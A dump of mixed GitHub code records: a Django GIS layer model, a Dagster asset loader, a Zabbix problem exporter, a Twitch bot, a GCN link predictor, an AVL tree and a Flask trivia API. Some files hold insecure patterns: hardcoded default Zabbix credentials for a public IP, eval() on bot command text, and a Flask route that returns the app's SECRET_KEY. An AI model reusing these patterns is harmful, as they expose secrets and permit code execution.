2056:\n if extent[0] < 2100000 or extent[0] > 2850000:\n raise ValidationError('south west Easting must be between 2100000 and 2850000')\n if extent[1] < 1050000 or extent[1] > 1400000:\n raise ValidationError('south west Northing must be between 1050000 and 1400000')\n if extent[2] < 2100000 or extent[2] > 2850000:\n raise ValidationError('north east Easting must be between 2100000 and 2850000')\n if extent[3] < 1050000 or extent[3] > 1400000:\n raise ValidationError('north east Northing must be between 1050000 and 1400000')\n if extent[2] < extent[0]:\n raise ValidationError('eastern x bound ({}) must larger than western x bound ({})'.format(extent[2], extent[0]))\n if extent[3] < extent[1]:\n raise ValidationError('eastern y bound ({}) must larger than western y bound ({})'.format(extent[2], extent[0]))\n\n return extent\n\n\n\nclass MapServerLayer(models.Model):\n\n created = models.DateTimeField(default=timezone.now)\n modified = models.DateTimeField(default=timezone.now)\n group = models.ForeignKey(\n 'layers.MapServerGroup',\n on_delete=models.CASCADE\n )\n\n mapserver_layer_name = models.CharField(max_length=512, null=True, blank=True)\n\n mapfile = models.TextField()\n mapfile_json = JSONField(blank=True)\n\n\n\n UNITS_CHOICE_METERS = 'meters'\n UNITS_CHOICES = (\n (UNITS_CHOICE_METERS, _('meters')),\n )\n units = models.CharField(\n max_length=32,\n choices=UNITS_CHOICES,\n default=UNITS_CHOICE_METERS\n )\n\n template = models.CharField(\n max_length=512,\n default='ttt'\n )\n\n status = models.BooleanField(default=True)\n def get_status_display(self):\n return 'ON' if self.status else 'OFF'\n\n wms_extent = ExtentField(null=True)\n wms_enable_request = models.CharField(max_length=128, default='*')\n\n objects = MapServerLayerManager()\n\n class Meta:\n unique_together = (('group', 'mapserver_layer_name'),)\n\n\n @property\n def has_siblings(self):\n return self.group.mapserverlayer_set.all().count() > 1\n \n\n @property\n def name(self):\n return self.mapserver_layer_name or self.group.dataset.name\n\n @property\n def __type__(self):\n return 'layer'\n\n @property\n def metadata(self):\n dct = {}\n dct['__type__'] = 'metadata'\n dct['wms_title'] = self.group.dataset.name\n dct['wms_extent'] = self.wms_extent\n dct['wms_enable_request'] = self.wms_enable_request\n return dct\n \n\n def __str__(self):\n return self.mapserver_layer_name or self.group.dataset.name\n \n def clean(self):\n \"\"\"clean is called during .save() to validate the model fields\"\"\"\n try:\n parsed_mapfile = mappyfile.loads(self.mapfile)\n except Exception as e:\n raise ValidationError(\"couldn't parse mapfile content: {}\".format(e))\n else:\n # print(parsed_mapfile)\n self.mapfile_json = parsed_mapfile\n self.mapfile_json['metadata']['wms_title'] = self.group.dataset.name\n self.mapfile_json['metadata']['wms_timeextent'] = self.group.dataset.timing\n self.mapfile_json['type'] = self.group.dataset.datatype.upper()\n if self.group.dataset.srs:\n self.mapfile_json['projection'] = [\"init={}\".format(self.group.dataset.srs.epsg.lower())]","repo_name":"boecklic/poc-layerservice","sub_path":"layerservice/layers/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70035355688","text":"#Задание №2. Функция, возвращающая три списка (%2==0, %3==0, %4==0).\r\ndef aliquot(num_list):\r\n al_2 = [n for n in num_list\r\n if n%2 == 0]\r\n al_3 = [n for n in num_list\r\n if n%3 == 0]\r\n al_4 = [n for n in num_list\r\n if n%4 == 0]\r\n return al_2, al_3, al_4\r\n\r\n\r\n#реализация работы функции\r\nnum_list = [2,3,4,5,6,22,24,25,9,22,6,9]\r\nal_2, al_3, al_4 = aliquot(num_list)\r\n\r\nprint ('a. Делятся на 2:\\n', al_2)\r\nprint ('b. Делятся на 3:\\n', al_3)\r\nprint ('c. Делятся на 4:\\n', al_4)\r\n","repo_name":"Nelistik/WebLab2","sub_path":"task№/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33280743145","text":"class Node:\r\n\tdef __init__(self, name):\r\n\t\tself.name = name\r\n\t\tself.children = []\r\n\r\n\tdef addChild(self, name):\r\n\t\tself.children.append(Node(name))\r\n\t\treturn self\r\n\r\n\t# O(v + e) time | O(v) space\r\n\t\r\n\tdef breadthFirstSearch(self, array):\r\n\t\tqueue = [self]\r\n\t\twhile len(queue) > 0:\r\n\t\t\tcurrent = queue.pop(0)\r\n\t\t\tarray.append(current.name)\r\n\t\t\tfor child in current.children:\r\n\t\t\t\tqueue.append(child)\r\n\t\treturn array","repo_name":"Abhishek-Rout/Competitive-Coding","sub_path":"AlgoExpert/2. Medium/Python/Breadth-first Search/Breadth-first Search.py","file_name":"Breadth-first Search.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"9888403617","text":"from contextlib import ExitStack\nfrom typing import Any, Dict, Mapping, Optional, Type, cast\n\nimport dagster._check as check\nfrom dagster._annotations import public\nfrom dagster._core.definitions.assets import AssetsDefinition\nfrom dagster._core.definitions.events import AssetKey, CoercibleToAssetKey\nfrom dagster._core.definitions.job_definition import (\n default_job_io_manager_with_fs_io_manager_schema,\n)\nfrom dagster._core.definitions.partition_key_range import PartitionKeyRange\nfrom dagster._core.definitions.resource_definition import ResourceDefinition\nfrom dagster._core.definitions.source_asset import SourceAsset\nfrom dagster._core.definitions.utils import DEFAULT_IO_MANAGER_KEY\nfrom dagster._core.execution.build_resources import build_resources, get_mapped_resource_config\nfrom dagster._core.execution.context.input import build_input_context\nfrom dagster._core.execution.context.output import build_output_context\nfrom dagster._core.execution.resources_init import get_transitive_required_resource_keys\nfrom dagster._core.instance import DagsterInstance\nfrom dagster._core.instance.config import is_dagster_home_set\nfrom dagster._core.types.dagster_type import resolve_dagster_type\nfrom dagster._utils.merger import merge_dicts\n\nfrom .io_manager import IOManager\n\n\nclass AssetValueLoader:\n \"\"\"Caches resource definitions that are used to load asset values across multiple load\n invocations.\n\n Should not be instantiated directly. Instead, use\n :py:meth:`~dagster.RepositoryDefinition.get_asset_value_loader`.\n \"\"\"\n\n def __init__(\n self,\n assets_defs_by_key: Mapping[AssetKey, AssetsDefinition],\n source_assets_by_key: Mapping[AssetKey, SourceAsset],\n instance: Optional[DagsterInstance] = None,\n ):\n self._assets_defs_by_key = assets_defs_by_key\n self._source_assets_by_key = source_assets_by_key\n self._resource_instance_cache: Dict[str, object] = {}\n self._exit_stack: ExitStack = ExitStack().__enter__()\n if not instance and is_dagster_home_set():\n self._instance = self._exit_stack.enter_context(DagsterInstance.get())\n else:\n self._instance = instance\n\n def _ensure_resource_instances_in_cache(\n self,\n resource_defs: Mapping[str, ResourceDefinition],\n resource_config: Optional[Mapping[str, Any]] = None,\n ):\n for built_resource_key, built_resource in (\n self._exit_stack.enter_context(\n build_resources(\n resources={\n resource_key: self._resource_instance_cache.get(resource_key, resource_def)\n for resource_key, resource_def in resource_defs.items()\n },\n instance=self._instance,\n resource_config=resource_config,\n )\n )\n ._asdict()\n .items()\n ):\n self._resource_instance_cache[built_resource_key] = built_resource\n\n @public\n def load_asset_value(\n self,\n asset_key: CoercibleToAssetKey,\n *,\n python_type: Optional[Type[object]] = None,\n partition_key: Optional[str] = None,\n metadata: Optional[Dict[str, Any]] = None,\n resource_config: Optional[Mapping[str, Any]] = None,\n ) -> object:\n \"\"\"Loads the contents of an asset as a Python object.\n\n Invokes `load_input` on the :py:class:`IOManager` associated with the asset.\n\n Args:\n asset_key (Union[AssetKey, Sequence[str], str]): The key of the asset to load.\n python_type (Optional[Type]): The python type to load the asset as. This is what will\n be returned inside `load_input` by `context.dagster_type.typing_type`.\n partition_key (Optional[str]): The partition of the asset to load.\n metadata (Optional[Dict[str, Any]]): Input metadata to pass to the :py:class:`IOManager`\n (is equivalent to setting the metadata argument in `In` or `AssetIn`).\n resource_config (Optional[Any]): A dictionary of resource configurations to be passed\n to the :py:class:`IOManager`.\n\n Returns:\n The contents of an asset as a Python object.\n \"\"\"\n asset_key = AssetKey.from_coercible(asset_key)\n resource_config = resource_config or {}\n output_metadata = {}\n\n if asset_key in self._assets_defs_by_key:\n assets_def = self._assets_defs_by_key[asset_key]\n\n resource_defs = merge_dicts(\n {DEFAULT_IO_MANAGER_KEY: default_job_io_manager_with_fs_io_manager_schema},\n assets_def.resource_defs,\n )\n io_manager_key = assets_def.get_io_manager_key_for_asset_key(asset_key)\n io_manager_def = resource_defs[io_manager_key]\n name = assets_def.get_output_name_for_asset_key(asset_key)\n output_metadata = assets_def.metadata_by_key[asset_key]\n op_def = assets_def.get_op_def_for_asset_key(asset_key)\n asset_partitions_def = assets_def.partitions_def\n elif asset_key in self._source_assets_by_key:\n source_asset = self._source_assets_by_key[asset_key]\n\n resource_defs = merge_dicts(\n {DEFAULT_IO_MANAGER_KEY: default_job_io_manager_with_fs_io_manager_schema},\n source_asset.resource_defs,\n )\n io_manager_key = source_asset.get_io_manager_key()\n io_manager_def = resource_defs[io_manager_key]\n name = asset_key.path[-1]\n output_metadata = source_asset.raw_metadata\n op_def = None\n asset_partitions_def = source_asset.partitions_def\n else:\n check.failed(f\"Asset key {asset_key} not found\")\n\n required_resource_keys = get_transitive_required_resource_keys(\n io_manager_def.required_resource_keys, resource_defs\n ) | {io_manager_key}\n\n self._ensure_resource_instances_in_cache(\n {k: v for k, v in resource_defs.items() if k in required_resource_keys},\n resource_config=resource_config,\n )\n io_manager = cast(IOManager, self._resource_instance_cache[io_manager_key])\n\n io_config = resource_config.get(io_manager_key)\n io_resource_config = {io_manager_key: io_config} if io_config else {}\n\n io_manager_config = get_mapped_resource_config(\n {io_manager_key: io_manager_def}, io_resource_config\n )\n\n input_context = build_input_context(\n name=None,\n asset_key=asset_key,\n dagster_type=resolve_dagster_type(python_type),\n upstream_output=build_output_context(\n name=name,\n metadata=output_metadata,\n asset_key=asset_key,\n op_def=op_def,\n resource_config=resource_config,\n ),\n resources=self._resource_instance_cache,\n resource_config=io_manager_config[io_manager_key].config,\n partition_key=partition_key,\n asset_partition_key_range=(\n PartitionKeyRange(partition_key, partition_key)\n if partition_key is not None\n else None\n ),\n asset_partitions_def=asset_partitions_def,\n instance=self._instance,\n metadata=metadata,\n )\n\n return io_manager.load_input(input_context)\n\n def __enter__(self):\n return self\n\n def __exit__(self, *exc):\n self._exit_stack.close()\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster/dagster/_core/storage/asset_value_loader.py","file_name":"asset_value_loader.py","file_ext":"py","file_size_in_byte":7578,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"86414885","text":"import os\nimport json\nfrom pyzabbix import ZabbixAPI\nimport datetime\n\n# Connect to the Zabbix API\nzapi = ZabbixAPI('http://182.93.91.116/zabbix/')\nzapi.login(\"Admin\", \"zabbix\")\n\n# Get the hosts and their status\nhosts = zapi.host.get(output=['hostid', 'name'])\n\nproblem_data = [] # Store problem data\n\nfor host in hosts:\n host_id = host['hostid']\n host_name = host['name']\n\n # Get problems for the host's interfaces\n problems = zapi.problem.get(\n output=['eventid', 'clock', 'severity', 'name'],\n select_acknowledges='extend',\n select_tags='extend',\n hostids=[host_id],\n filter={'value': 1}\n )\n\n for problem in problems:\n problem_start_time = problem['clock']\n problem_severity = problem['severity']\n problem_description = problem['name']\n\n # Convert UNIX timestamp to datetime object\n start_time = datetime.datetime.fromtimestamp(int(problem_start_time)).strftime('%Y-%m-%d %H:%M:%S')\n\n problem_info = {\n 'Time': start_time,\n 'Severity': problem_severity,\n 'Description': problem_description,\n 'Host': host_name\n }\n\n problem_data.append(problem_info)\n\n# Sort problem_data based on descending time\nproblem_data.sort(key=lambda x: x['Time'], reverse=True)\n\n# Disconnect from the Zabbix API\nzapi.user.logout()\n\n# Get the directory of the current script\nscript_dir = os.path.dirname(os.path.abspath(__file__))\nfile_path = os.path.join(script_dir, 'problems.json') # Construct the file path\n\n# Save problem data to JSON file\nwith open(file_path, 'w') as json_file:\n json.dump(problem_data, json_file, indent=4)\n\nprint(\"Problem data saved to 'problems.json' file.\")\n","repo_name":"Anmol2059/zabbixTicket","sub_path":"static/2problems.py","file_name":"2problems.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5094161919","text":"# bot.py\n# The code for our bot\n\nimport cfg\nimport utils\nimport sql\nimport socket\nimport re\nimport time, thread\nfrom time import sleep\n\nclass Command(object):\n cmd = \"\"\n response = \"\"\n description = \"\"\n op = 0\n def __init__(self, cmd, response, description, op):\n self.cmd = cmd\n self.response = response\n self.description = description\n self.op = op\n\ndef parse(c, s):\n if c.response.find(\"~\") > -1:\n list = c.response.split(\"~\")\n for item in list:\n if item.find(\"{\") > -1:\n code = item.split(\"{\")[1].split(\"}\")[0]\n utils.chat(s, item.split(\"{\")[0] + eval(code))\n else:\n utils.chat(s, item)\n else:\n\n if c.response.find(\"{\") > -1:\n code = c.response.split(\"{\")[1].split(\"}\")[0]\n utils.chat(s, c.response.split(\"{\")[0] + eval(code))\n else:\n utils.chat(s, c.response)\n\ndef main():\n # Networking functions\n s = socket.socket()\n s.connect((cfg.HOST, cfg.PORT))\n s.send(\"PASS {}\\r\\n\".format(cfg.PASS).encode(\"utf-8\"))\n s.send(\"NICK {}\\r\\n\".format(cfg.NICK).encode(\"utf-8\"))\n s.send(\"JOIN #{}\\r\\n\".format(cfg.CHAN).encode(\"utf-8\"))\n\n CHAT_MSG = re.compile(r\"^:\\w+!\\w+@\\w+\\.tmi\\.twitch\\.tv PRIVMSG #\\w+ :\")\n utils.chat(s, \"Hi everyone!\")\n\n thread.start_new_thread(utils.threadFillOpList, ())\n\n commands = sql.getCommands()\n\n cmd = []\n for c in commands:\n cmd.append(Command(c[\"Command\"], c[\"Response\"], c[\"Description\"], c[\"Op\"]))\n\n while True:\n response = s.recv(1024).decode(\"utf-8\")\n if response == \"PING :tmi.twitch.tv\\r\\n\":\n s.send(\"PONG :tmi.twitch.tv\\r\\n\".encode(\"utf-8\"))\n else:\n username = re.search(r\"\\w+\", response).group(0)\n message = CHAT_MSG.sub(\"\", response)\n print(response)\n\n for c in cmd:\n if message.strip() == c.cmd:\n if c.op == 0:\n parse(c, s)\n else:\n if utils.isOp(username):\n parse(c, s)\n sleep(1)\n utils.chat(s, \"Bye everyone :)\");\nif __name__ == \"__main__\":\n main()","repo_name":"Limeoats/Creating-a-Twitch-Bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"31961249726","text":"import dgl\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom dgl.nn import GraphConv\nfrom ogb.linkproppred import DglLinkPropPredDataset, Evaluator\nfrom torch.utils.data import DataLoader\nimport argparse\n\n\n# Define the GCN model\nclass GCN(nn.Module):\n def __init__(self, in_feats, hid_feats, emb_feats):\n super(GCN, self).__init__()\n self.conv1 = GraphConv(in_feats, hid_feats)\n self.conv2 = GraphConv(hid_feats, emb_feats)\n self.dropout = nn.Dropout(0.2)\n\n def forward(self, graph, x):\n # Move the input to the device of the graph\n x = x.to(graph.device)\n\n # Compute node embeddings\n x = self.conv1(graph, x)\n x = F.relu(x)\n x = self.dropout(x)\n x = self.conv2(graph, x)\n return x\n\n\n# Define the link prediction model\nclass LinkPredictor(nn.Module):\n def __init__(self, emb_feats, hid_feats, out_feats):\n super(LinkPredictor, self).__init__()\n self.lin1 = nn.Linear(emb_feats, hid_feats)\n self.lin2 = nn.Linear(hid_feats, out_feats)\n self.dropout = nn.Dropout(0.2)\n\n def forward(self, i_emb, j_emb):\n # Compute the link prediction scores\n x = i_emb * j_emb\n x = self.lin1(x)\n x = F.relu(x)\n x = self.dropout(x)\n x = self.lin2(x)\n\n # Use sigmoid to normalize the scores to be between 0 and 1\n return torch.sigmoid(x)\n\n\ndef train(model, predictor, graph, split_edge, optimizer, batch_size):\n # Set the model to train mode\n model.train()\n predictor.train()\n\n # Find the device for the graph\n device = graph.device\n\n # Get the train edges and move them to the device\n train_edges = split_edge[\"train\"][\"edge\"].to(device)\n train_feats = graph.ndata[\"feat\"]\n\n # Initialize the loss and number of examples\n total_loss = total_examples = 0\n\n # Sample a batch of edges\n for perm in DataLoader(range(train_edges.size(0)), batch_size, shuffle=True):\n # Clear the gradients\n optimizer.zero_grad()\n\n # Compute node embeddings\n emb_x = model(graph, train_feats)\n\n # Predict positive edges\n edge = train_edges[perm].t().to(device)\n pos_out = predictor(emb_x[edge[0]], emb_x[edge[1]])\n pos_loss = -torch.log(pos_out + 1e-15).mean()\n\n # Generate negative edges\n edge = torch.randint(\n 0, graph.num_nodes(), edge.size(), dtype=torch.long, device=emb_x.device\n )\n\n # Predict negative edges\n neg_out = predictor(emb_x[edge[0]], emb_x[edge[1]])\n neg_loss = -torch.log(1 - neg_out + 1e-15).mean()\n loss = pos_loss + neg_loss\n\n # Backward and update\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)\n torch.nn.utils.clip_grad_norm_(predictor.parameters(), 1.0)\n optimizer.step()\n\n # Compute the loss and number of examples\n num_examples = pos_out.size(0)\n total_loss += loss.item() * num_examples\n total_examples += num_examples\n\n return total_loss / total_examples\n\n\n@torch.no_grad()\ndef eval(model, predictor, graph, split_edge, evaluator, batch_size):\n # Set the model to evaluation mode\n model.eval()\n predictor.eval()\n\n # Find the device for the graph\n device = graph.device\n\n # Get different splitted edges and move them to the device\n pos_train_edges = split_edge[\"train\"][\"edge\"].to(device)\n pos_valid_edges = split_edge[\"valid\"][\"edge\"].to(device)\n neg_valid_edges = split_edge[\"valid\"][\"edge_neg\"].to(device)\n pos_test_edges = split_edge[\"test\"][\"edge\"].to(device)\n neg_test_edges = split_edge[\"test\"][\"edge_neg\"].to(device)\n feats = graph.ndata[\"feat\"]\n\n # Compute node embeddings\n emb_x = model(graph, feats)\n\n pos_train_preds = []\n for perm in DataLoader(range(pos_train_edges.size(0)), batch_size, shuffle=False):\n edge = pos_train_edges[perm].t()\n pos_train_preds.append(predictor(emb_x[edge[0]], emb_x[edge[1]]).squeeze())\n pos_train_preds = torch.cat(pos_train_preds, dim=0)\n\n pos_valid_preds = []\n for perm in DataLoader(range(pos_valid_edges.size(0)), batch_size, shuffle=False):\n edge = pos_valid_edges[perm].t()\n pos_valid_preds.append(predictor(emb_x[edge[0]], emb_x[edge[1]]).squeeze())\n pos_valid_preds = torch.cat(pos_valid_preds, dim=0)\n\n neg_valid_preds = []\n for perm in DataLoader(range(neg_valid_edges.size(0)), batch_size, shuffle=False):\n edge = neg_valid_edges[perm].t()\n neg_valid_preds.append(predictor(emb_x[edge[0]], emb_x[edge[1]]).squeeze())\n neg_valid_preds = torch.cat(neg_valid_preds, dim=0)\n\n pos_test_preds = []\n for perm in DataLoader(range(pos_test_edges.size(0)), batch_size, shuffle=False):\n edge = pos_test_edges[perm].t()\n pos_test_preds.append(predictor(emb_x[edge[0]], emb_x[edge[1]]).squeeze().cpu())\n pos_test_preds = torch.cat(pos_test_preds, dim=0)\n\n neg_test_preds = []\n for perm in DataLoader(range(neg_test_edges.size(0)), batch_size, shuffle=False):\n edge = neg_test_edges[perm].t()\n neg_test_preds.append(predictor(emb_x[edge[0]], emb_x[edge[1]]).squeeze().cpu())\n neg_test_preds = torch.cat(neg_test_preds, dim=0)\n\n evaluator.K = 50\n train_hits = evaluator.eval(\n {\n \"y_pred_pos\": pos_train_preds,\n \"y_pred_neg\": neg_valid_preds,\n }\n )[\"hits@50\"]\n valid_hits = evaluator.eval(\n {\n \"y_pred_pos\": pos_valid_preds,\n \"y_pred_neg\": neg_valid_preds,\n }\n )[\"hits@50\"]\n test_hits = evaluator.eval(\n {\n \"y_pred_pos\": pos_test_preds,\n \"y_pred_neg\": neg_test_preds,\n }\n )[\"hits@50\"]\n\n results = [train_hits, valid_hits, test_hits]\n\n return results\n\n\ndef main():\n # Create the argument parser and parse the command-line arguments\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--save\",\n type=int,\n default=100,\n help=\"specify how many epochs to run before saving the model\",\n )\n parser.add_argument(\n \"--epochs\",\n type=int,\n default=400,\n help=\"specify how many epochs to run in total\",\n )\n parser.add_argument(\n \"--batch_size\",\n type=int,\n default=65536,\n help=\"specify the batch size during training and testing\",\n )\n parser.add_argument(\"--eval_steps\", type=int, default=1)\n\n # Parse the command-line arguments\n args = parser.parse_args()\n\n # Use GPU if available\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n print(\"Using device:\", device)\n\n # Load dataset\n dataset = DglLinkPropPredDataset(name=\"ogbl-collab\")\n split_edge = dataset.get_edge_split()\n graph = dataset[0]\n\n # Add self-loops to the graph\n graph = graph.add_self_loop()\n\n # Prepare features\n in_feats = graph.ndata[\"feat\"].shape[1]\n train_feats = graph.ndata[\"feat\"]\n\n # Create model and optimizer\n emb_feats = 256\n hid_feats = 256\n model = GCN(in_feats, hid_feats, emb_feats).to(device)\n predictor = LinkPredictor(emb_feats, hid_feats, 1).to(device)\n optimizer = torch.optim.Adam(\n list(model.parameters()) + list(predictor.parameters()), lr=0.0005\n )\n\n # Move graph to device\n graph = graph.to(device)\n\n # Set the number of epochs and the batch size\n batch_size = args.batch_size\n epochs = args.epochs + 1\n for epoch in range(epochs):\n print(f\"Training epoch {epoch}...\")\n\n # Train model\n loss = train(model, predictor, graph, split_edge, optimizer, batch_size)\n print(f\"train loss: {loss}\")\n\n # Evaluate model\n if epoch % args.eval_steps == 0:\n evaluator = Evaluator(name=\"ogbl-collab\")\n result = eval(model, predictor, graph, split_edge, evaluator, batch_size)\n print(f\"hits@50: {result}\")\n\n print(f\"Finished epoch {epoch}\\n\")\n\n # Save the model checkpoint if epoch is multiple of 10\n save = args.save\n if epoch % save != 0:\n continue\n torch.save(\n {\n \"epoch\": epoch,\n \"model_state_dict\": model.state_dict(),\n \"predictor_state_dict\": predictor.state_dict(),\n \"optimizer_state_dict\": optimizer.state_dict(),\n \"loss\": loss,\n },\n f\"GCN_checkpoint_epoch{epoch}.pt\",\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"HuFY-dev/GEMS-GCN","sub_path":"link_predict.py","file_name":"link_predict.py","file_ext":"py","file_size_in_byte":8514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36925892204","text":"# Overview\n# In this notebook you will complete the following implementation of the balanced (AVL) binary search tree. \n# Note that you should not be implementing the map-based API described in the plain (unbalanced) BSTree notebook\n# — i.e., nodes in the AVLTree will only contain a single value.\n\nclass AVLTree:\n class Node:\n def __init__(self, val, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n def rotate_right(self):\n n = self.left\n self.val, n.val = n.val, self.val\n self.left, n.left, self.right, n.right = n.left, n.right, n, self.right\n\n def rotate_left(self):\n n = self.right\n self.val, n.val = n.val, self.val\n self.right, n.right, self.left, n.left = n.right, n.left, n, self.left\n\n @staticmethod\n def height(n):\n if not n:\n return 0\n else:\n return max(1 + AVLTree.Node.height(n.left), 1 + AVLTree.Node.height(n.right))\n\n def __init__(self):\n self.size = 0\n self.root = None\n\n \n @staticmethod\n def rebalance(node):\n if AVLTree.Node.height(node.left) > AVLTree.Node.height(node.right):\n if AVLTree.Node.height(node.left.left) >= AVLTree.Node.height(node.left.right):\n # left-left\n #print('left-left imbalance detected')\n node.rotate_right()\n else:\n # left-right\n #print('left-right imbalance detected')\n node.left.rotate_left()\n node.rotate_right()\n else:\n # right branch imbalance tests needed\n if AVLTree.Node.height(node.right.right) >= AVLTree.Node.height(node.right.left):\n #right-right \n node.rotate_left()\n else:\n #right-left\n node.right.rotate_right()\n node.rotate_left()\n\n def add(self, val): # O(log N)\n assert (val not in self)\n\n def add_rec(node):\n if not node:\n return AVLTree.Node(val)\n elif val < node.val:\n node.left = add_rec(node.left)\n else:\n node.right = add_rec(node.right)\n\n # detect and fix imbalance\n if abs(AVLTree.Node.height(node.left) - AVLTree.Node.height(node.right)) >= 2:\n AVLTree.rebalance(node)\n\n return node\n\n self.root = add_rec(self.root)\n self.size += 1\n\n def __delitem__(self, val): # O(log N)\n assert (val in self)\n\n def delitem_rec(node):\n if val < node.val:\n node.left = delitem_rec(node.left)\n elif val > node.val:\n node.right = delitem_rec(node.right)\n else:\n if not node.left and not node.right:\n return None\n elif node.left and not node.right:\n return node.left\n elif node.right and not node.left:\n return node.right\n else:\n to_del = node.left\n if not to_del.right:\n node.left = to_del.left\n else:\n par = to_del\n to_del = par.right\n to_fix = [par]\n while to_del.right:\n par = par.right\n to_fix.append(par)\n to_del = to_del.right\n\n # to_del refers to the right-most node, and par to its parent\n par.right = to_del.left\n\n # to_fix contains all the nodes I need to check for rebalancing\n for n in to_fix[::-1]: # traverse list in reverse\n if abs(AVLTree.Node.height(n.left) - AVLTree.Node.height(n.right)) >= 2:\n AVLTree.rebalance(n)\n\n node.val = to_del.val\n\n # detect and fix imbalance (recursively)\n if abs(AVLTree.Node.height(node.left) - AVLTree.Node.height(node.right)) >= 2:\n AVLTree.rebalance(node)\n\n return node\n\n self.root = delitem_rec(self.root)\n self.size -= 1\n\n def __contains__(self, val):\n def contains_rec(node):\n if not node:\n return False\n elif val < node.val:\n return contains_rec(node.left)\n elif val > node.val:\n return contains_rec(node.right)\n else:\n return True\n\n return contains_rec(self.root)\n\n def __len__(self):\n return self.size\n\n def __iter__(self):\n def iter_rec(node):\n if node:\n yield from iter_rec(node.left)\n yield node.val\n yield from iter_rec(node.right)\n\n yield from iter_rec(self.root)\n\n def pprint(self, width=64):\n \"\"\"Attempts to pretty-print this tree's contents.\"\"\"\n height = self.height()\n nodes = [(self.root, 0)]\n prev_level = 0\n repr_str = ''\n while nodes:\n n, level = nodes.pop(0)\n if prev_level != level:\n prev_level = level\n repr_str += '\\n'\n if not n:\n if level < height - 1:\n nodes.extend([(None, level + 1), (None, level + 1)])\n repr_str += '{val:^{width}}'.format(val='-', width=width // 2 ** level)\n elif n:\n if n.left or level < height - 1:\n nodes.append((n.left, level + 1))\n if n.right or level < height - 1:\n nodes.append((n.right, level + 1))\n repr_str += '{val:^{width}}'.format(val=n.val, width=width // 2 ** level)\n print(repr_str)\n\n def height(self):\n \"\"\"Returns the height of the longest branch of the tree.\"\"\"\n\n def height_rec(t):\n if not t:\n return 0\n else:\n return max(1 + height_rec(t.left), 1 + height_rec(t.right))\n\n return height_rec(self.root)\n","repo_name":"NaserAlkuhili/Data-Structures","sub_path":"AVLTree.py","file_name":"AVLTree.py","file_ext":"py","file_size_in_byte":6251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4704388995","text":"import os\nimport random\nfrom os import environ\nfrom flask import Flask, abort, jsonify, request\nfrom flask_cors import CORS\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy.sql.expression import func\nfrom models import Category, Question, setup_db\n\nQUESTIONS_PER_PAGE = 10\n\n\ndef create_app(test_config=None):\n # create and configure the app\n app = Flask(__name__)\n app.config[\"SECRET_KEY\"] = os.environ.get('SECRET_KEY')\n setup_db(app)\n\n CORS(app, origins={'*'})\n\n # CORS(app )\n\n @app.after_request\n def after_request(response):\n response.headers.add('Access-Control-Allow-Headers',\n 'Content-Type, Authorization')\n response.headers.add('Access-Control-Allow-Methods',\n 'GET , POST , PATCH , DELETE , OPTIONS')\n return response\n\n @app.route('/')\n def hello():\n return jsonify({\n 'SECRET_KEY':app.config[\"SECRET_KEY\"],\n })\n\n @app.route('/categories')\n def get_categories():\n categories = {}\n for category in Category.query.all():\n categories[category.id] = category.type\n return jsonify({\n 'categories': categories,\n \"success\": True\n })\n\n @app.route('/questions', methods=['GET'])\n def get_questions():\n page = request.args.get('page', 1, type=int)\n # start = (page-1) * 10\n # end = start +10\n questions = Question.query.paginate(page, 10)\n\n # total = Question.total\n total = len(Question.query.all())\n questions = questions.items\n\n current_category = Question.category\n\n categories = {}\n for category in Category.query.all():\n categories[category.id] = category.type\n\n questions = [i.format() for i in questions]\n return jsonify({\n 'success': True,\n 'questions': questions,\n 'total': total,\n 'categories': categories,\n })\n\n @app.route('/questions/', methods=['DELETE'])\n def del_question(question_id):\n deleted_questions = Question.query.filter(\n Question.id == question_id).one_or_none()\n\n if deleted_questions is None:\n abort(404)\n\n else:\n deleted_questions.delete()\n return jsonify({\n 'success': True,\n 'deleted_questions': deleted_questions.format()\n })\n\n @app.route('/questions', methods=['POST'])\n def add_question():\n body = request.get_json()\n question = body.get('question')\n answer = body.get('answer')\n category = body.get('category')\n difficulty = body.get('difficulty')\n\n q = Question(question=question, answer=answer,\n category=category, difficulty=difficulty)\n\n q.insert()\n\n return jsonify({\n 'success': True,\n 'question': q.format()\n })\n\n @app.route('/search', methods=['POST'])\n def search_question():\n body = request.get_json()\n search_term = body.get('searchTerm')\n questions = Question.query.filter(\n Question.question.ilike(f'%{search_term}%')).all()\n questions = [i.format() for i in questions]\n return jsonify({\n 'success': True,\n 'questions': questions\n })\n\n @app.route('/categories//questions', methods=['POST'])\n def get_question_by_category(id):\n category = Category.query.filter_by(id=id).one_or_none()\n questions = Question.query.filter(Question.category == str(id)).all()\n questions = [i.format() for i in questions]\n return jsonify({\n 'success': True,\n 'questions': questions,\n 'current_category': category.type\n })\n\n @app.route('/quizzes', methods=['POST'])\n def play_quiz():\n body = request.get_json()\n previous = body.get('previous_questions')\n category = body.get('quiz_category')\n\n if (category['id'] == \"0\"):\n questions = Question.query.filter(\n Question.id.notin_((previous))).all()\n else:\n questions = Question.query.filter_by(category=category['id']).filter(\n Question.id.notin_((previous))).all()\n\n new_questions = 